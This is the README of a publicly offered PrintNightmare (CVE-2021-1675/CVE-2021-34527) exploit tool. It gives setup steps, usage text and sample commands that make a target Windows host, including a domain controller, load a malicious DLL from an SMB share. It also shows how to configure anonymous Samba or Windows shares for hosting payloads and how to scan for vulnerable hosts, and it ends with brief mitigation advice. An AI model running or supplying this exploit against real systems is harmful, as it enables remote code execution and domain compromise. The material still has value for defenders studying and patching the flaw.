CVE-2021-1675
CVE-2021-1675 copied to clipboard
tothi
C# and Impacket implementation (here with Kerberos auth support) of PrintNightmare CVE-2021-1675/CVE-2021-34527
CVE-2021-1675 / CVE-2021-34527
Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
Tested on a fully patched 2019 Domain Controller
Added Kerberos authentication support in this fork.
Execute malicious DLL's remote or locally
Installation
Before running the exploit you need to install my version of Impacket and after that you're gucci
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
CVE-2021-1675.py
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] target share [pDriverPath]
PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
pDriverPath Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
optional arguments:
-h, --help show this help message and exit
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
Example;
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
./CVE-2021-1675.py -k -no-pass -dc-ip 192.168.1.1 -target-ip 192.168.1.10 vulnserver.corp.local '\\192.168.1.215\smb\addCube.dll'
SMB configuration
Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
Other option without manually editing configuration is net usershare (see related Samba documentation
pages).
From windows it's also possible
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
Scanning
We can use rpcdump.py from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable
rpcdump.py @192.168.1.10 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol
Mitigation
Disable Spooler service
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
Or Uninstall Print-Services
Uninstall-WindowsFeature Print-Services
tothi